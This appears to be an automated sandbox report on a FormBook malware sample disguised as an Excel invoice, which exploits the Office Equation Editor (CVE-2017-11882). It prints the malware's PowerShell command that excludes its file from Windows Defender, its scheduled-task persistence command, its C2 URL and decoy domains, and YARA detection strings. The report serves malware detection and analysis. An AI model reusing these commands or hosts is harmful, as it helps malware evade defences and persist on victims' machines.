Play interactive tour

Edit tour

Windows Analysis Report PROFORMA INVOICE.xlsx

Overview

General Information

Sample Name:	PROFORMA INVOICE.xlsx
Analysis ID:	528789
MD5:	f0e46aba95165b11ad7fc84d80a73730
SHA1:	2ea511219e2c3d76597483c4998a2af40d821142
SHA256:	009dfe9d9409704671b802ddaa54ee22355f3ff41c6ef779b7e644c76466e0b0
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: EQNEDT32.EXE connecting to internet

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sigma detected: Suspect Svchost Activity

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Sigma detected: Suspicious Svchost Process

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Sample uses process hollowing technique

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Suspicius Add Task From User AppData Temp

Sigma detected: Powershell Defender Exclusion

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Drops PE files to the user directory

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Office Equation Editor has been started

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1212 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2828 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2224 cmdline: "C:\Users\Public\vbc.exe" MD5: 6926A53FA91CAB577D52942A39E5FB53)

powershell.exe (PID: 2776 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 2916 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

vbc.exe (PID: 3008 cmdline: C:\Users\Public\vbc.exe MD5: 6926A53FA91CAB577D52942A39E5FB53)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

autofmt.exe (PID: 1964 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)

svchost.exe (PID: 2608 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8e58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x91f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x30c78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31012:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe2ea8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe3242:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14f05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3cd25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xeef55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x149f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3c811:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xeea41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15007:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3ce27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xef057:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1517f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3cf9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xef1cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9c0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x31a2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xe3c5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17329:$sqlite3step: 68 34 1C 7B E1 0x1743c:$sqlite3step: 68 34 1C 7B E1 0x3f149:$sqlite3step: 68 34 1C 7B E1 0x3f25c:$sqlite3step: 68 34 1C 7B E1 0xf1379:$sqlite3step: 68 34 1C 7B E1 0xf148c:$sqlite3step: 68 34 1C 7B E1 0x17358:$sqlite3text: 68 38 2A 90 C5 0x1747d:$sqlite3text: 68 38 2A 90 C5 0x3f178:$sqlite3text: 68 38 2A 90 C5 0x3f29d:$sqlite3text: 68 38 2A 90 C5 0xf13a8:$sqlite3text: 68 38 2A 90 C5 0xf14cd:$sqlite3text: 68 38 2A 90 C5 0x1736b:$sqlite3blob: 68 53 D8 7F 8C 0x17493:$sqlite3blob: 68 53 D8 7F 8C 0x3f18b:$sqlite3blob: 68 53 D8 7F 8C 0x3f2b3:$sqlite3blob: 68 53 D8 7F 8C 0xf13bb:$sqlite3blob: 68 53 D8 7F 8C 0xf14e3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2224	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.vbc.exe.228f148.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
9.0.vbc.exe.400000.9.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.9.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.9.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.22fc90c.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
9.0.vbc.exe.400000.7.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.7.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.7.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
9.0.vbc.exe.400000.7.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.7.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.7.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
9.0.vbc.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
